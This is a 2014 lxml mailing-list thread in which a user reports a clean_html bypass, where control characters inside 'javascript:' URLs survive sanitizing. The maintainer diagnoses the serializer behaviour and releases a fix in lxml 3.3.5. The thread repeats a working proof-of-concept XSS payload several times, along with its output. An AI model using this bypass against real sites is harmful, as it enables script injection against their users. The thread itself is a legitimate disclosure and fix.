Hi, guys. I've accidentally found vulnerability in clean_html function. User can break schema of url with nonprinted chars (\x01-\x08). Here is PoC. from lxml.html.clean import clean_html html = '''\ <html> <body> <a href="javascript:alert(0)">aaa</a> <a href="javas\x01cript:alert(1)">bbb</a> <a href="javas\x02cript:alert(1)">bbb</a> <a href="javas\x03cript:alert(1)">bbb</a> <a href="javas\x04cript:alert(1)">bbb</a> <a href="javas\x05cript:alert(1)">bbb</a> <a href="javas\x06cript:alert(1)">bbb</a> <a href="javas\x07cript:alert(1)">bbb</a> <a href="javas\x08cript:alert(1)">bbb</a> <a href="javas\x09cript:alert(1)">bbb</a> </body> </html>''' print clean_html(html) Output: <div> <body> <a href="">aaa</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="">bbb</a> </body> </div> I'm not a python programmer, so can't give you quick fix. Found it by blackbox testing on one site that uses lxml. I'm not sure if it's bug or maybe I just got things wrong. ---- ksimka (@m_ksimka)
Максим Кочкин, 15.04.2014 20:33:
I've accidentally found vulnerability in clean_html function. User can break schema of url with nonprinted chars (\x01-\x08). Here is PoC.
from lxml.html.clean import clean_html
html = '''\ <html> <body> <a href="javascript:alert(0)">aaa</a> <a href="javas\x01cript:alert(1)">bbb</a> <a href="javas\x02cript:alert(1)">bbb</a> <a href="javas\x03cript:alert(1)">bbb</a> <a href="javas\x04cript:alert(1)">bbb</a> <a href="javas\x05cript:alert(1)">bbb</a> <a href="javas\x06cript:alert(1)">bbb</a> <a href="javas\x07cript:alert(1)">bbb</a> <a href="javas\x08cript:alert(1)">bbb</a> <a href="javas\x09cript:alert(1)">bbb</a> </body> </html>'''
print clean_html(html)
Output:
<div> <body> <a href="">aaa</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="">bbb</a> </body> </div>
I'm not a python programmer, so can't give you quick fix. Found it by blackbox testing on one site that uses lxml. I'm not sure if it's bug or maybe I just got things wrong.
Interesting. Thanks for bringing this up, although it's usually better to announce this kind of problem less openly when first discovering it. It's a problem in the HTML serialiser which seems to filter out illegal characters:
from lxml.etree import HTML, tostring h = HTML(html) h[0][1].get('href') tostring(h[0][1]) '<a href="javas\x01cript:alert(1)">bbb</a>\n' tostring(h[0][1], method='html') '<a href="javascript:alert(1)">bbb</a>\n'
I guess the fix would be to proactively make clean() filter them out *before* doing anything else that depends on text content. Stefan
Stefan Behnel, 16.04.2014 07:46:
Максим Кочкин, 15.04.2014 20:33:
I've accidentally found vulnerability in clean_html function. User can break schema of url with nonprinted chars (\x01-\x08). Here is PoC.
from lxml.html.clean import clean_html
html = '''\ <html> <body> <a href="javascript:alert(0)">aaa</a> <a href="javas\x01cript:alert(1)">bbb</a> <a href="javas\x02cript:alert(1)">bbb</a> <a href="javas\x03cript:alert(1)">bbb</a> <a href="javas\x04cript:alert(1)">bbb</a> <a href="javas\x05cript:alert(1)">bbb</a> <a href="javas\x06cript:alert(1)">bbb</a> <a href="javas\x07cript:alert(1)">bbb</a> <a href="javas\x08cript:alert(1)">bbb</a> <a href="javas\x09cript:alert(1)">bbb</a> </body> </html>'''
print clean_html(html)
Output:
<div> <body> <a href="">aaa</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="">bbb</a> </body> </div>
I'm not a python programmer, so can't give you quick fix. Found it by blackbox testing on one site that uses lxml. I'm not sure if it's bug or maybe I just got things wrong.
Interesting. Thanks for bringing this up, although it's usually better to announce this kind of problem less openly when first discovering it.
It's a problem in the HTML serialiser which seems to filter out illegal characters:
from lxml.etree import HTML, tostring h = HTML(html) h[0][1].get('href') tostring(h[0][1]) '<a href="javas\x01cript:alert(1)">bbb</a>\n' tostring(h[0][1], method='html') '<a href="javascript:alert(1)">bbb</a>\n'
I guess the fix would be to proactively make clean() filter them out *before* doing anything else that depends on text content.
Done: https://github.com/lxml/lxml/commit/e86b294f1f81b899a59925123560ff924a72f1cc Stefan
Stefan Behnel, 17.04.2014 22:00:
Stefan Behnel, 16.04.2014 07:46:
Максим Кочкин, 15.04.2014 20:33:
I've accidentally found vulnerability in clean_html function. User can break schema of url with nonprinted chars (\x01-\x08). Here is PoC.
from lxml.html.clean import clean_html
html = '''\ <html> <body> <a href="javascript:alert(0)">aaa</a> <a href="javas\x01cript:alert(1)">bbb</a> <a href="javas\x02cript:alert(1)">bbb</a> <a href="javas\x03cript:alert(1)">bbb</a> <a href="javas\x04cript:alert(1)">bbb</a> <a href="javas\x05cript:alert(1)">bbb</a> <a href="javas\x06cript:alert(1)">bbb</a> <a href="javas\x07cript:alert(1)">bbb</a> <a href="javas\x08cript:alert(1)">bbb</a> <a href="javas\x09cript:alert(1)">bbb</a> </body> </html>'''
print clean_html(html)
Output:
<div> <body> <a href="">aaa</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="javascript:alert(1)">bbb</a> <a href="">bbb</a> </body> </div>
I'm not a python programmer, so can't give you quick fix. Found it by blackbox testing on one site that uses lxml. I'm not sure if it's bug or maybe I just got things wrong.
Interesting. Thanks for bringing this up, although it's usually better to announce this kind of problem less openly when first discovering it.
It's a problem in the HTML serialiser which seems to filter out illegal characters:
from lxml.etree import HTML, tostring h = HTML(html) h[0][1].get('href') tostring(h[0][1]) '<a href="javas\x01cript:alert(1)">bbb</a>\n' tostring(h[0][1], method='html') '<a href="javascript:alert(1)">bbb</a>\n'
I guess the fix would be to proactively make clean() filter them out *before* doing anything else that depends on text content.
Done:
https://github.com/lxml/lxml/commit/e86b294f1f81b899a59925123560ff924a72f1cc
Fixed in lxml 3.3.5. Stefan
participants (2)
-
Stefan Behnel -
Максим Кочкин